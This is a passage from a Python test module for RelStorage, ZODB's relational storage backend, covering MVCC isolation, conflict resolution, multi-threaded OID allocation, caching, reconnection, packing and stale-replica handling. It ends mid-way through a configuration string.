from __future__ import absolute_import
from __future__ import print_function
# pylint:disable=too-many-ancestors,abstract-method,too-many-public-methods,too-many-lines
# pylint:disable=too-many-statements,too-many-locals
import contextlib
import functools
import os
import random
import shutil
import tempfile
import time
import threading
import unittest
from textwrap import dedent
import transaction
from persistent import Persistent
from persistent.mapping import PersistentMapping
from zc.zlibstorage import ZlibStorage
import ZODB.tests.util
from ZODB.Connection import TransactionMetaData
from ZODB.DB import DB
from ZODB.FileStorage import FileStorage
from ZODB.POSException import ReadConflictError
from ZODB.POSException import ReadOnlyError
from ZODB.serialize import referencesf
from ZODB.utils import z64
from ZODB.utils import u64 as bytes8_to_int64
from ZODB.utils import p64 as int64_to_8bytes
from ZODB.tests import BasicStorage
from ZODB.tests import ConflictResolution
from ZODB.tests import MTStorage
from ZODB.tests import PackableStorage
from ZODB.tests import PersistentStorage
from ZODB.tests import ReadOnlyStorage
from ZODB.tests import StorageTestBase
from ZODB.tests import Synchronization
from ZODB.tests.StorageTestBase import zodb_pickle
from ZODB.tests.StorageTestBase import zodb_unpickle
from ZODB.tests.MinPO import MinPO
from . import fakecache
from . import util
from . import mock
from . import TestCase
from . import StorageCreatingMixin
from . import skipIfNoConcurrentWriters
from .persistentcache import PersistentCacheStorageTests
from .locking import TestLocking
from .test_zodbconvert import ZlibWrappedFSZODBConvertTests
class RelStorageTestBase(StorageCreatingMixin,
TestCase,
StorageTestBase.StorageTestBase):
base_dbname = None # Override
keep_history = None # Override
_storage_created = None
def _close(self):
# Override from StorageTestBase.
# Try to avoid creating one through our _storage property.
if '_storage' in self.__dict__:
storage = self._storage
else:
storage = self._storage_created
self._storage = None
if storage is not None:
storage.close()
storage.cleanup()
def make_storage_to_cache(self):
return self.make_storage()
def get_storage(self):
# Create a storage with default options
# if it has not been created already.
storage = self._storage_created
if storage is None:
storage = self.make_storage_to_cache()
self._storage_created = storage
return storage
def set_storage(self, storage):
self._storage_created = storage
_storage = property(
lambda self: self.get_storage(),
lambda self, nv: self.set_storage(nv)
)
def open(self, read_only=False, **kwargs):
# This is used by a few ZODB tests that close and reopen the storage.
storage = self._storage
if storage is not None:
self._storage = None
storage.close()
storage.cleanup()
self._storage = storage = self.make_storage(
read_only=read_only, zap=False, **kwargs)
return storage
class StorageClientThread(MTStorage.StorageClientThread):
# MTStorage assumes that the storage object is thread safe.
# This doesn't make any sense for an MVCC Storage like RelStorage;
# don't try to use a single instance in multiple threads.
#
# This patch makes it respect that.
def __init__(self, storage, *args, **kwargs):
storage = storage.new_instance()
super(StorageClientThread, self).__init__(storage, *args, **kwargs)
def runtest(self):
try:
super(StorageClientThread, self).runtest()
finally:
self.storage.release()
self.storage = None
class ExtStorageClientThread(StorageClientThread, MTStorage.ExtStorageClientThread):
"Same as above."
class ThreadWrapper(object):
def __init__(self, storage):
self.__storage = storage
        # We can't use an RLock here: an RLock insists that the thread that
        # acquired it is the one that releases it, but check_tid_ordering_w_commit
        # deliberately spreads acquire and release across threads.
self.__commit_lock = threading.Lock()
rl = self.__read_lock = threading.Lock()
self.__txn = None
def make_locked(name):
meth = getattr(storage, name)
@functools.wraps(meth)
def func(*args, **kwargs):
with rl:
return meth(*args, **kwargs)
return func
for name in (
'loadBefore',
'load',
'store',
'getTid',
'lastTransaction',
):
setattr(self, name, make_locked(name))
def __getattr__(self, name):
return getattr(self.__storage, name)
def tpc_begin(self, txn):
self.__commit_lock.acquire()
self.__read_lock.acquire()
assert not self.__txn
self.__txn = txn
self.__read_lock.release()
return self.__storage.tpc_begin(txn)
def tpc_finish(self, txn, callback=None):
self.__read_lock.acquire()
assert txn is self.__txn
try:
return self.__storage.tpc_finish(txn, callback)
finally:
self.__txn = None
self.__commit_lock.release()
self.__read_lock.release()
def tpc_abort(self, txn):
self.__read_lock.acquire()
assert txn is self.__txn, (txn, self.__txn)
try:
return self.__storage.tpc_abort(txn)
finally:
self.__txn = None
self.__commit_lock.release()
self.__read_lock.release()
class UsesThreadsOnASingleStorageMixin(object):
# These tests attempt to use threads on a single storage object.
# That doesn't make sense with MVCC, where every instance is its
# own connection and doesn't need to do any locking. This mixin makes
# those tests use a special storage that locks.
@contextlib.contextmanager
def __thread_safe_wrapper(self):
orig_storage = self._storage
wrapped = self._storage = ThreadWrapper(orig_storage)
try:
yield
finally:
if self._storage is wrapped:
self._storage = orig_storage
def __generic_wrapped_test(self, meth_name):
meth = getattr(
super(UsesThreadsOnASingleStorageMixin, self),
meth_name)
try:
with self.__thread_safe_wrapper():
meth()
finally:
self._storage.zap_all(slow=True)
def make_func(name): # pylint:disable=no-self-argument
return lambda self: self.__generic_wrapped_test(name)
for bad_test in (
'check_checkCurrentSerialInTransaction',
# This one stores a b'y' (invalid pickle) into the
# database as the root object, so if we don't get zapped
# afterwards, we can't open the database.
'check_tid_ordering_w_commit',
):
locals()[bad_test] = make_func(bad_test)
del make_func
del bad_test
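# NOTE: explanatory sketch, not part of the test suite. The locals() loop in
# UsesThreadsOnASingleStorageMixin above is equivalent to writing explicit
# wrappers such as:
#
#     def check_tid_ordering_w_commit(self):
#         self.__generic_wrapped_test('check_tid_ordering_w_commit')
#
# so each listed multi-threaded check runs against a ThreadWrapper-wrapped
# storage and the database is zapped afterwards.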
class GenericRelStorageTests(
UsesThreadsOnASingleStorageMixin,
RelStorageTestBase,
PersistentCacheStorageTests,
TestLocking,
BasicStorage.BasicStorage,
PackableStorage.PackableStorage,
Synchronization.SynchronizedStorage,
ConflictResolution.ConflictResolvingStorage,
PersistentStorage.PersistentStorage,
MTStorage.MTStorage,
ReadOnlyStorage.ReadOnlyStorage,
):
def setUp(self):
# ZODB.tests.util.TestCase likes to change directories
# It tries to change back in tearDown(), but if there's an error,
# we may not get to tearDown. addCleanup() always runs, though.
        # Register the chdir cleanup first so it runs as the very last cleanup
        # (cleanups added later, for example by subclasses, run before it).
self.addCleanup(os.chdir, os.getcwd())
super(GenericRelStorageTests, self).setUp()
# PackableStorage is particularly bad about leaving things
# dangling. For example, if the ClientThread runs into
# problems, it doesn't close its connection, which can leave
# locks dangling until GC happens and break other threads and even
# other tests.
#
# Patch around that. Be sure to only close a given connection once,
# though.
_closing = self._closing
def db_factory(storage, *args, **kwargs):
db = _closing(DB(storage, *args, **kwargs))
db_open = db.open
def o(transaction_manager=None, at=None, before=None):
conn = db_open(transaction_manager=transaction_manager,
at=at,
before=before)
_closing(conn)
if transaction_manager is not None:
# If we're using an independent transaction, abort it *before*
# attempting to close the connection; that means it must be registered
# after the connection.
self.addCleanup(transaction_manager.abort)
return conn
db.open = o
return db
PackableStorage.DB = db_factory
self.addCleanup(setattr, MTStorage,
'StorageClientThread', MTStorage.StorageClientThread)
MTStorage.StorageClientThread = StorageClientThread
self.addCleanup(setattr, MTStorage,
'ExtStorageClientThread', MTStorage.ExtStorageClientThread)
MTStorage.ExtStorageClientThread = ExtStorageClientThread
def tearDown(self):
PackableStorage.DB = DB
super(GenericRelStorageTests, self).tearDown()
def _make_readonly(self):
# checkWriteMethods in ReadOnlyStorage assumes that
# the object has an undo() method, even though that's only
# required if it's IStorageUndoable, aka history-preserving.
super(GenericRelStorageTests, self)._make_readonly()
storage = self._storage
if not hasattr(storage, 'undo'):
def undo(*args, **kwargs):
raise ReadOnlyError
storage.undo = undo # pylint:disable=attribute-defined-outside-init
return storage
def checkCurrentObjectTidsRoot(self):
# Get the root object in place
db = self._closing(DB(self._storage))
conn = self._closing(db.open())
storage = conn._storage
cursor = storage._load_connection.cursor
oid_to_tid = storage._adapter.mover.current_object_tids(cursor, [0])
self.assertEqual(1, len(oid_to_tid))
self.assertIn(0, oid_to_tid)
# Ask for many, many objects that don't exist.
# Force the implementation to loop if that's what it does internally.
oid_to_tid = storage._adapter.mover.current_object_tids(cursor, range(0, 3523))
self.assertEqual(1, len(oid_to_tid))
self.assertIn(0, oid_to_tid)
# No matching oids.
oid_to_tid = storage._adapter.mover.current_object_tids(cursor, range(1, 3523))
self.assertEqual(0, len(oid_to_tid))
conn.close()
db.close()
def checkLen(self):
# Override the version from BasicStorage because we
# actually do guarantee to keep track of the counts,
# within certain limits.
# len(storage) reports the number of objects.
# check it is zero when empty
self.assertEqual(len(self._storage), 0)
        # check it is correct when the storage contains two objects.
        # (The generic version allows len() to be zero for storages that do
        # not keep track of this number; here we assert the real count.)
self._dostore(data=PersistentMapping())
self._dostore(data=PersistentMapping())
self._storage._adapter.stats.large_database_change()
self.assertEqual(len(self._storage), 2)
def checkDropAndPrepare(self):
# Under PyPy, this test either takes a very long time (PyMySQL)
# or hangs (psycopg2cffi) longer than I want to wait (10+ minutes).
# This suggests there's a lock on a particular table (the eighth table we drop)
# which in turn suggests that there are connections still open and leaked!
# Running a manual GC seems to fix it. It's hard to reproduce manually because
# it seems to depend on a particular set of tests being run.
import gc
gc.collect()
gc.collect()
self._storage._adapter.schema.drop_all()
self._storage._adapter.schema.prepare()
def checkCrossConnectionInvalidation(self):
# Verify connections see updated state at txn boundaries
db = DB(self._storage)
try:
c1 = db.open()
r1 = c1.root()
r1['myobj'] = 'yes'
c2 = db.open()
r2 = c2.root()
self.assertNotIn('myobj', r2)
storage = c1._storage
t = transaction.Transaction()
t.description = u'invalidation test'
c1.tpc_begin(t)
c1.commit(t)
storage.tpc_vote(storage._transaction)
storage.tpc_finish(storage._transaction)
self.assertNotIn('myobj', r2)
c2.sync()
self.assertIn('myobj', r2)
self.assertEqual(r2['myobj'], 'yes')
finally:
db.close()
def checkCrossConnectionIsolation(self):
# Verify MVCC isolates connections
db = DB(self._storage)
try:
c1 = db.open()
r1 = c1.root()
r1['alpha'] = PersistentMapping()
r1['gamma'] = PersistentMapping()
transaction.commit()
# Open a second connection but don't load root['alpha'] yet
c2 = db.open()
r2 = c2.root()
r1['alpha']['beta'] = 'yes'
storage = c1._storage
t = transaction.Transaction()
t.description = u'isolation test 1'
c1.tpc_begin(t)
c1.commit(t)
storage.tpc_vote(storage._transaction)
storage.tpc_finish(storage._transaction)
# The second connection will now load root['alpha'], but due to
# MVCC, it should continue to see the old state.
self.assertIsNone(r2['alpha']._p_changed) # A ghost
self.assertFalse(r2['alpha'])
self.assertEqual(r2['alpha']._p_changed, 0)
# make root['alpha'] visible to the second connection
c2.sync()
# Now it should be in sync
self.assertIsNone(r2['alpha']._p_changed) # A ghost
self.assertTrue(r2['alpha'])
self.assertEqual(r2['alpha']._p_changed, 0)
self.assertEqual(r2['alpha']['beta'], 'yes')
# Repeat the test with root['gamma']
r1['gamma']['delta'] = 'yes'
storage = c1._storage
t = transaction.Transaction()
t.description = u'isolation test 2'
c1.tpc_begin(t)
c1.commit(t)
storage.tpc_vote(storage._transaction)
storage.tpc_finish(storage._transaction)
            # The second connection will now load root['gamma'], but due to MVCC,
            # it should continue to see the old state.
self.assertIsNone(r2['gamma']._p_changed) # A ghost
self.assertFalse(r2['gamma'])
self.assertEqual(r2['gamma']._p_changed, 0)
            # make root['gamma'] visible to the second connection
c2.sync()
# Now it should be in sync
self.assertIsNone(r2['gamma']._p_changed) # A ghost
self.assertTrue(r2['gamma'])
self.assertEqual(r2['gamma']._p_changed, 0)
self.assertEqual(r2['gamma']['delta'], 'yes')
finally:
db.close()
def checkResolveConflictBetweenConnections(self, clear_cache=False):
# Verify that conflict resolution works between storage instances
# bound to connections.
obj = ConflictResolution.PCounter()
obj.inc()
# Establish a polling state; dostoreNP won't.
self._storage.poll_invalidations()
oid = self._storage.new_oid()
revid1 = self._dostoreNP(oid, data=zodb_pickle(obj))
self._storage.poll_invalidations()
# These will both poll and get the state for (oid, revid1)
# cached at that location, where it will be found during conflict
# resolution.
storage1 = self._storage.new_instance()
storage1.load(oid, '')
storage2 = self._storage.new_instance()
storage2.load(oid, '')
# Remember that the cache stats are shared between instances.
# The first had to fetch it, the second can use it.
__traceback_info__ = storage1._cache.stats()
self.assertEqual(storage1._cache.stats()['hits'], 1)
storage1._cache.reset_stats()
if clear_cache:
storage1._cache.clear(load_persistent=False)
self.assertEqual(storage1._cache.stats()['hits'], 0)
obj.inc()
obj.inc()
# The effect of committing two transactions with the same
# pickle is to commit two different transactions relative to
# revid1 that add two to _value.
root_storage = self._storage
try:
def noConflict(*_args, **_kwargs):
self.fail("Should be no conflict.")
storage1.tryToResolveConflict = noConflict
self._storage = storage1
_revid2 = self._dostoreNP(oid, revid=revid1, data=zodb_pickle(obj))
# This one had no conflicts and did no cache work
self.assertEqual(storage1._cache.stats()['hits'], 0)
self.assertEqual(storage1._cache.stats()['misses'], 0)
# This will conflict; we will prefetch everything through the cache,
# or database, and not the storage's loadSerial.
def noLoadSerial(*_args, **_kwargs):
self.fail("loadSerial on the storage should never be called")
storage2.loadSerial = noLoadSerial
self._storage = storage2
_revid3 = self._dostoreNP(oid, revid=revid1, data=zodb_pickle(obj))
# We don't actually update cache stats at all, however,
# despite the prefetching.
cache_stats = storage1._cache.stats()
__traceback_info__ = cache_stats, clear_cache
self.assertEqual(cache_stats['misses'], 0)
self.assertEqual(cache_stats['hits'], 0)
data, _serialno = self._storage.load(oid, '')
inst = zodb_unpickle(data)
self.assertEqual(inst._value, 5)
finally:
storage1.close()
storage2.close()
self._storage = root_storage
def checkResolveConflictBetweenConnectionsNoCache(self):
# If we clear the cache, we can still loadSerial()
self.checkResolveConflictBetweenConnections(clear_cache=True)
def check16KObject(self):
# Store 16 * 1024 bytes in an object, then retrieve it
data = b'a 16 byte string' * 1024
oid = self._storage.new_oid()
self._dostoreNP(oid, data=data)
got, _ = self._storage.load(oid, '')
self.assertIsInstance(got, bytes)
self.assertEqual(got, data)
self.assertEqual(len(got), len(data))
def check16MObject(self):
# Store 16 * 1024 * 1024 bytes in an object, then retrieve it
data = b'a 16 byte string' * (1024 * 1024)
oid = self._storage.new_oid()
self._dostoreNP(oid, data=data)
got, _serialno = self._storage.load(oid, '')
self.assertEqual(len(got), len(data))
self.assertEqual(got, data)
def check99X1900Objects(self):
# Store 99 objects each with 1900 bytes. This is intended
# to exercise possible buffer overfilling that the batching
# code might cause.
data = b'0123456789012345678' * 100
t = TransactionMetaData()
self._storage.tpc_begin(t)
oids = []
for _ in range(99):
oid = self._storage.new_oid()
self._storage.store(oid, b'\0'*8, data, '', t)
oids.append(oid)
self._storage.tpc_vote(t)
self._storage.tpc_finish(t)
for oid in oids:
got, _serialno = self._storage.load(oid, '')
self.assertEqual(len(got), len(data))
self.assertEqual(got, data)
def checkPreventOIDOverlap(self):
# Store an object with a particular OID, then verify that
# OID is not reused.
data = b'mydata'
oid1 = b'\0' * 7 + b'\x0f'
self._dostoreNP(oid1, data=data)
oid2 = self._storage.new_oid()
oid1_int = bytes8_to_int64(oid1)
oid2_int = bytes8_to_int64(oid2)
self.assertGreater(
oid2_int, oid1_int,
'old OID %r (%d) should be less than new OID %r (%d)'
% (oid1, oid1_int, oid2, oid2_int))
def checkNoDuplicateOIDsManyThreads(self):
# Many threads in many storages can allocate OIDs with
# no duplicates or overlaps.
# https://github.com/zodb/relstorage/issues/283
from itertools import combinations
thread_count = 11
oids_per_segment = 578
segment_count = 3
total_expected_oids = oids_per_segment * segment_count
oids_by_thread = [list() for _ in range(thread_count)]
def allocate_oids(thread_storage, thread_num):
conn_pool = thread_storage._store_connection_pool
store_conn = conn_pool.borrow()
try:
allocator = thread_storage._oids
my_oids = oids_by_thread[thread_num]
for _ in range(segment_count):
my_oids.extend(
bytes8_to_int64(thread_storage.new_oid())
for _ in range(oids_per_segment)
)
# Periodically call set_min_oid, like the storage does,
# to check for interference.
with conn_pool.borrowing() as store_conn:
allocator.set_min_oid(store_conn, my_oids[-1])
store_conn.commit()
finally:
self.assertLessEqual(conn_pool.pooled_connection_count, len(threads))
thread_storage.release()
threads = [threading.Thread(target=allocate_oids,
args=(self._storage.new_instance(), i))
for i in range(thread_count)]
for t in threads:
t.start()
for t in threads:
t.join(99)
# All of them are released, so we should be down to only one instance.
self.assertEqual(1, self._storage._store_connection_pool.instance_count)
self.assertLessEqual(self._storage._store_connection_pool.pooled_connection_count, 1)
# They all have the desired length, and each one has no duplicates.
self.assertEqual(
[len(s) for s in oids_by_thread],
[total_expected_oids for _ in range(thread_count)]
)
self.assertEqual(
[len(s) for s in oids_by_thread],
[len(set(s)) for s in oids_by_thread]
)
# They are all disjoint
for a, b in combinations(oids_by_thread, 2):
__traceback_info__ = a, b
a = set(a)
b = set(b)
self.assertTrue(a.isdisjoint(b))
# They are all monotonically increasing.
for s in oids_by_thread:
self.assertEqual(
s,
sorted(s)
)
def checkUseCache(self):
# Store an object, cache it, then retrieve it from the cache
self._storage = self.make_storage(
cache_servers='x:1 y:2',
cache_module_name=fakecache.__name__,
cache_prefix='zzz',
)
fakecache.data.clear()
db = DB(self._storage)
try:
c1 = db.open()
self.assertEqual(
c1._storage._cache.cache.g.client.servers,
['x:1', 'y:2'])
r1 = c1.root()
# The root state and checkpoints should now be cached.
# A commit count *might* be cached depending on the ZODB version.
# (Checkpoints are stored in the cache for the sake of tests/monitoring,
# but aren't read.)
# self.assertIn('zzz:checkpoints', fakecache.data)
# self.assertIsNotNone(db.storage._cache.polling_state.checkpoints)
self.assertEqual(sorted(fakecache.data.keys())[-1][:10],
'zzz:state:')
r1['alpha'] = PersistentMapping()
transaction.commit()
cp_count = 1
if self.keep_history:
item_count = 2
else:
# The previous root state was automatically invalidated
# XXX: We go back and forth on that.
item_count = 2
item_count += cp_count
self.assertEqual(len(fakecache.data), item_count)
oid = r1['alpha']._p_oid
c1._storage.load(oid, '')
# Came out of the cache, nothing new
self.assertEqual(len(fakecache.data), item_count)
# make a change
r1['beta'] = 0
transaction.commit()
            # Once again, history-free storages automatically invalidated the old state.
# XXX: Depending on my mood.
item_count += 1
self.assertEqual(len(fakecache.data), item_count)
c1._storage.load(oid, '')
# try to load an object that doesn't exist
self.assertRaises(KeyError, c1._storage.load, b'bad.oid.', '')
finally:
db.close()
def checkMultipleStores(self):
# Verify a connection can commit multiple transactions
db = DB(self._storage)
try:
c1 = db.open()
r1 = c1.root()
r1['alpha'] = 1
transaction.commit()
r1['alpha'] = 2
transaction.commit()
finally:
db.close()
def checkLongTransactionDescription(self):
# Don't trip over long transaction descriptions
db = DB(self._storage)
try:
c = db.open()
r = c.root()
r['key'] = 1
transaction.get().note(u'A long description. ' * 1000)
transaction.commit()
finally:
db.close()
def checkAutoReconnect(self):
# Verify auto-reconnect
db = self._closing(DB(self._storage))
c1 = db.open()
r = c1.root()
r['alpha'] = 1
transaction.commit()
c1.close()
# Going behind its back.
c1._storage._load_connection.connection.close()
c1._storage._store_connection_pool.hard_close_all_connections()
store_pool = c1._storage._store_connection_pool
self.assertEqual(store_pool.instance_count, 2)
self.assertLessEqual(store_pool.pooled_connection_count, 1)
# ZODB5 implicitly calls sync
# immediately when a connection is opened;
# fake that here for older releases.
c2 = db.open()
self.assertIs(c2, c1)
c2.sync()
r = c2.root()
self.assertEqual(r['alpha'], 1)
r['beta'] = PersistentMapping()
c2.add(r['beta']) # Calling new_oid outside of TPC
transaction.commit()
c2.close()
del c1
del c2
def checkAutoReconnectOnSync(self):
# Verify auto-reconnect.
db = self._closing(DB(self._storage))
c1 = db.open()
r = c1.root()
c1._storage._load_connection.connection.close()
c1._storage.sync(True)
# ZODB5 calls sync when a connection is opened. Our monkey
# patch on a Connection makes sure that works in earlier
# versions, but we don't have that patch on ZODB5. So test
        # the storage directly. NOTE: The load connection must be open
        # to trigger the actual sync.
r = c1.root()
r['alpha'] = 1
transaction.commit()
c1.close()
c1._storage._load_connection.connection.close()
c1._storage._store_connection_pool.hard_close_all_connections()
store_pool = c1._storage._store_connection_pool
self.assertEqual(store_pool.instance_count, 2)
self.assertLessEqual(store_pool.pooled_connection_count, 1)
c2 = db.open()
self.assertIs(c2, c1)
self.assertEqual(store_pool.instance_count, 2)
self.assertLessEqual(store_pool.pooled_connection_count, 1)
r = c2.root()
self.assertEqual(r['alpha'], 1)
r['beta'] = PersistentMapping()
c2.add(r['beta'])
transaction.commit()
c2.close()
del c1
del c2
def checkCachePolling(self):
storage2 = self.make_storage(zap=False)
db = DB(self._storage)
db2 = DB(storage2)
try:
# Set up the database.
tm1 = transaction.TransactionManager()
c1 = db.open(transaction_manager=tm1)
r1 = c1.root()
r1['obj'] = obj1 = PersistentMapping({'change': 0})
tm1.commit()
# Load and change the object in an independent connection.
tm2 = transaction.TransactionManager()
c2 = db2.open(transaction_manager=tm2)
r2 = c2.root()
r2['obj']['change'] = 1
tm2.commit()
# Now c2 has delta_after0.
# self.assertEqual(len(c2._storage._cache.delta_after0), 2)
c2.close()
# Change the object in the original connection.
c1.sync()
obj1['change'] = 2
tm1.commit()
# Close the database connection to c2.
c2._storage._load_connection.drop()
self.assertFalse(c2._storage._load_connection)
# Make the database connection to c2 reopen without polling.
c2._storage.load(b'\0' * 8, '')
self.assertTrue(c2._storage._load_connection)
# Open a connection, which should be the same connection
# as c2.
c3 = db2.open(transaction_manager=tm2)
self.assertTrue(c3 is c2)
# self.assertEqual(len(c2._storage._cache.delta_after0), 2)
# Clear the caches (but not delta_after*)
c3._resetCache()
c3._storage._cache.cache.flush_all()
obj3 = c3.root()['obj']
# Should have loaded the new object.
self.assertEqual(obj3['change'], 2)
finally:
db.close()
db2.close()
def checkDoubleCommitter(self):
# Verify we can store an object that gets committed twice in
# a single transaction.
db = DB(self._storage)
try:
conn = db.open()
try:
conn.root()['dc'] = DoubleCommitter()
transaction.commit()
conn2 = db.open()
self.assertEqual(conn2.root()['dc'].new_attribute, 1)
conn2.close()
finally:
transaction.abort()
conn.close()
finally:
db.close()
def checkHistoryWithExtension(self):
# Verify the history method works with transactions that have
# extended info.
db = DB(self._storage)
try:
conn = db.open()
try:
conn.root()['pi'] = 3.14
transaction.get().setExtendedInfo("digits", 3)
transaction.commit()
history = self._storage.history(conn.root()._p_oid)
self.assertEqual(len(history), 1)
if self.keep_history:
self.assertEqual(history[0]['digits'], 3)
finally:
conn.close()
finally:
db.close()
def checkPackBatchLockNoWait(self):
# Holding the commit lock doesn't interfere with packing.
#
# TODO: But what about row locking? Let's add a test
# that begins a commit and locks some rows and then packs.
self._storage = self.make_storage(pack_batch_timeout=0)
adapter = self._storage._adapter
test_conn, test_cursor = adapter.connmanager.open_for_store()
db = self._closing(DB(self._storage))
try:
# add some data to be packed
c = self._closing(db.open())
r = c.root()
r['alpha'] = PersistentMapping()
transaction.commit()
del r['alpha']
transaction.commit()
# Pack, with a commit lock held
now = packtime = time.time()
while packtime <= now:
packtime = time.time()
adapter.locker.hold_commit_lock(test_cursor)
self._storage.pack(packtime, referencesf)
adapter.locker.release_commit_lock(test_cursor)
finally:
db.close()
adapter.connmanager.close(test_conn, test_cursor)
def checkPackKeepNewObjects(self):
# Packing should not remove objects created or modified after
# the pack time, even if they are unreferenced.
db = DB(self._storage)
try:
# add some data to be packed
c = db.open()
extra1 = PersistentMapping()
c.add(extra1)
extra2 = PersistentMapping()
c.add(extra2)
transaction.commit()
            # Choose the pack time to be that of the last committed transaction.
packtime = c._storage.lastTransactionInt()
extra2.foo = 'bar'
extra3 = PersistentMapping()
c.add(extra3)
transaction.commit()
self.assertGreater(c._storage.lastTransactionInt(), packtime)
self._storage.pack(packtime, referencesf)
# extra1 should have been garbage collected
self.assertRaises(KeyError,
self._storage.load, extra1._p_oid, '')
# extra2 and extra3 should both still exist
self._storage.load(extra2._p_oid, '')
self._storage.load(extra3._p_oid, '')
finally:
db.close()
def checkPackBrokenPickle(self):
# Verify the pack stops with the right exception if it encounters
# a broken pickle.
# Under Python 2, with zodbpickle, there may be a difference depending
        # on whether the accelerated implementation is in use. Also, the pure-Python
        # version on PyPy can raise IndexError.
from zodbpickle.pickle import UnpicklingError as pUnpickErr
unpick_errs = (pUnpickErr, IndexError)
try:
from zodbpickle.fastpickle import UnpicklingError as fUnpickErr
except ImportError:
pass
else:
unpick_errs += (fUnpickErr,)
self._dostoreNP(self._storage.new_oid(), data=b'brokenpickle')
self.assertRaises(unpick_errs, self._storage.pack,
time.time() + 10000, referencesf)
def checkBackwardTimeTravelWithoutRevertWhenStale(self):
# If revert_when_stale is false (the default), when the database
# connection is stale (such as through failover to an
# asynchronous slave that is not fully up to date), the poller
# should notice that backward time travel has occurred and
# raise a ReadConflictError.
self._storage = self.make_storage(revert_when_stale=False)
db = DB(self._storage)
try:
c = db.open()
c._storage._adapter.poller.transactions_may_go_backwards = True
r = c.root()
r['alpha'] = PersistentMapping()
transaction.commit()
# To simulate failover to an out of date async slave, take
# a snapshot of the database at this point, change some
# object, then restore the database to its earlier state.
d = tempfile.mkdtemp()
try:
# Snapshot the database.
fs = FileStorage(os.path.join(d, 'Data.fs'))
fs.copyTransactionsFrom(c._storage)
# Change data in it.
r['beta'] = PersistentMapping()
transaction.commit()
self.assertTrue('beta' in r)
# Revert the data.
# We must use a separate, unrelated storage object to do this,
# because our storage object is smart enough to notice that the data
# has been zapped and revert caches for all connections and
# ZODB objects when we invoke this API.
storage_2 = self.make_storage(zap=False)
storage_2.zap_all(reset_oid=False, slow=True)
storage_2.copyTransactionsFrom(fs)
storage_2.close()
del storage_2
fs.close()
del fs
finally:
shutil.rmtree(d)
# Sync, which will call poll_invalidations().
c.sync()
# Try to load an object, which should cause ReadConflictError.
r._p_deactivate()
with self.assertRaises(ReadConflictError):
r.__getitem__('beta')
finally:
db.close()
def checkBackwardTimeTravelWithRevertWhenStale(self):
# If revert_when_stale is true, when the database
# connection is stale (such as through failover to an
# asynchronous slave that is not fully up to date), the poller
# should notice that backward time travel has occurred and
# invalidate all objects that have changed in the interval.
self._storage = self.make_storage(revert_when_stale=True)
db = DB(self._storage)
try:
transaction.begin()
c = db.open()
r = c.root()
r['alpha'] = PersistentMapping()
transaction.commit()
# To simulate failover to an out of date async slave, take
# a snapshot of the database at this point, change some
# object, then restore the database to its earlier state.
d = tempfile.mkdtemp()
try:
transaction.begin()
fs = FileStorage(os.path.join(d, 'Data.fs'))
fs.copyTransactionsFrom(c._storage)
r['beta'] = PersistentMapping()
transaction.commit()
self.assertTrue('beta' in r)
c._storage.zap_all(reset_oid=False, slow=True)
c._storage.copyTransactionsFrom(fs)
fs.close()
finally:
shutil.rmtree(d)
# r should still be in the cache.
self.assertTrue('beta' in r)
# Now sync, which will call poll_invalidations().
c.sync()
# r should have been invalidated
self.assertEqual(r._p_changed, None)
# r should be reverted to its earlier state.
self.assertFalse('beta' in r)
finally:
db.close()
@util.skipOnAppveyor("Random failures")
# https://ci.appveyor.com/project/jamadden/relstorage/build/1.0.75/job/32uu4xdp5mubqma8
def checkBTreesLengthStress(self):
# BTrees.Length objects are unusual Persistent objects: they
# have a conflict resolution algorithm that cannot fail, so if
# we do get a failure it's due to a problem with us.
# Unfortunately, tryResolveConflict hides all underlying exceptions
# so we have to enable logging to see them.
from relstorage.adapters.interfaces import UnableToAcquireLockError
from ZODB.ConflictResolution import logger as CRLogger
from BTrees.Length import Length
import BTrees
from six import reraise
def log_err(*args, **kwargs): # pylint:disable=unused-argument
import sys
reraise(*sys.exc_info())
CRLogger.debug = log_err
CRLogger.exception = log_err
updates_per_thread = 50
thread_count = 4
lock_errors = []
self.maxDiff = None
db = DB(self._storage)
try:
c = db.open()
try:
root = c.root()
root['length'] = Length()
# XXX: Eww! On MySQL, if we try to take a shared lock on
# OID 0, and a write lock on OID 1, we fail with a deadlock
# error. It seems that taking the shared lock on 0 also takes a shared
# lock on 1 --- somehow. Because they're adjacent to each other?
# I don't know. We have to add some space between them to be sure
# that doesn't happen. On MySQL 5.7, just 10 extra items was enough.
# On MySQL 8, we had to add more.
for i in range(50):
root[i] = BTrees.OOBTree.BTree() # pylint:disable=no-member
transaction.commit()
except:
transaction.abort()
raise
finally:
c.close()
def updater():
for _ in range(updates_per_thread):
thread_c = db.open()
__traceback_info__ = thread_c._storage
try:
# Perform readCurrent on an object not being modified.
# This adds stress to databases that use separate types of locking
# for modified and current objects. It was used to discover
# bugs in gevent+MySQL and plain MySQLdb against both 5.7 and 8.
root = thread_c.root()
root._p_activate() # unghost; only non-ghosts can readCurrent
root._p_jar.readCurrent(root)
root['length'].change(1)
time.sleep(random.random() * 0.05)
try:
transaction.commit()
except UnableToAcquireLockError as e:
lock_errors.append((type(e), str(e)))
transaction.abort()
raise
finally:
thread_c.close()
threads = []
for _ in range(thread_count):
t = threading.Thread(target=updater)
threads.append(t)
for t in threads:
t.start()
for t in threads:
t.join(120)
self.assertEqual(lock_errors, [])
c = db.open()
try:
self.assertEqual(c.root()['length'](),
updates_per_thread * thread_count)
finally:
transaction.abort()
c.close()
finally:
db.close()
del CRLogger.debug
del CRLogger.exception
def checkAfterCompletion(self):
        # The afterCompletion method, which can only be called
        # outside of 2-phase commit, is otherwise equivalent to calling
# tpc_abort.
from ZODB.interfaces import IMVCCAfterCompletionStorage
self._storage = self.make_storage(revert_when_stale=False)
with mock.patch.object(self._storage._load_connection,
'rollback_quietly') as rb:
self._storage.afterCompletion()
rb.assert_called_with()
self.assertTrue(
IMVCCAfterCompletionStorage.providedBy(self._storage))
def checkConfigureViaZConfig(self):
replica_fn = None
replica_conf = ''
if util.DEFAULT_DATABASE_SERVER_HOST == util.STANDARD_DATABASE_SERVER_HOST:
replica_fn = self.get_adapter_zconfig_replica_conf()
if replica_fn:
replica_conf = 'replica-conf ' + self.get_adapter_zconfig_replica_conf()
conf = u"""
%import relstorage
<zodb main>
<relstorage>
name xyz
read-only false
keep-history {KEEP_HISTORY}
{REPLICA_CONF}
blob-dir .
blob-cache-size-check-external true
blob-cache-size 100MB
blob-chunk-size 10MB
cache-local-dir-read-count 12
cache-local-dir-write-max-size 10MB
{ADAPTER}
</relstorage>
</zodb>
""".format(
KEEP_HISTORY='true' if self.keep_history else 'false',
REPLICA_CONF=replica_conf,
